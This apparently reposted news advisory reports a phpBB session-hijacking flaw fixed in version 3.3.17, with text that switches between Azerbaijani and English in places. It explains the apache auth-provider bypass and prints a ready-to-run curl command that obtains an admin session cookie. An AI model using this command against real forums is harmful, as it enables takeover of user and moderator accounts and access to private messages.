Hər hansı bir hesabın doğrulama olmadan əldə edilməsinə imkan verən phpBB-də zəiflik

phpBB forum creation engine has a vulnerability that allows an attacker to connect to any forum user's session by sending a single HTTP request. The vulnerability is present in the default configuration of phpBB. The issue has been fixed in version phpBB 3.3.17.

An attack on regular users can give access to private messages and allow sending messages on behalf of the user. When targeting moderators and administrators, it is possible to delete other users' messages and view IP ünvanlarını emails, read private messages, but access to the admin interface and the host is not possible.

Details about the vulnerability are not provided, but using AI based on the fix, an exploitation method has already been recreated. It is based on calling the 'login_link' handler with the authentication method 'auth_provider=apache' and injecting the username via Basic Auth. After that, PHP sets the environment variable 'PHP_AUTH_USER=username', and phpBB retrieves the username without checking the password. For example, to get the session ID of the admin user and save it to the file cookies.txt, you can execute the code:

curl -i -s \
-c cookies.txt \
-b cookies.txt \
-u 'admin:anything' \
-d 'login=Login&login_username=admin&login_password=anything' \
'https://target.example/forum/ucp.php?mode=login_link&auth_provider=apache&login_link_any=1'

Mənbə: opennet.ru

DDoS qoruması olan saytlara etibarlı hosting satın alın, VPS VDS serverlər 🔥 DDoS qoruması olan saytlara etibarlı hosting satın alın, VPS VDS serverlər | ProHoster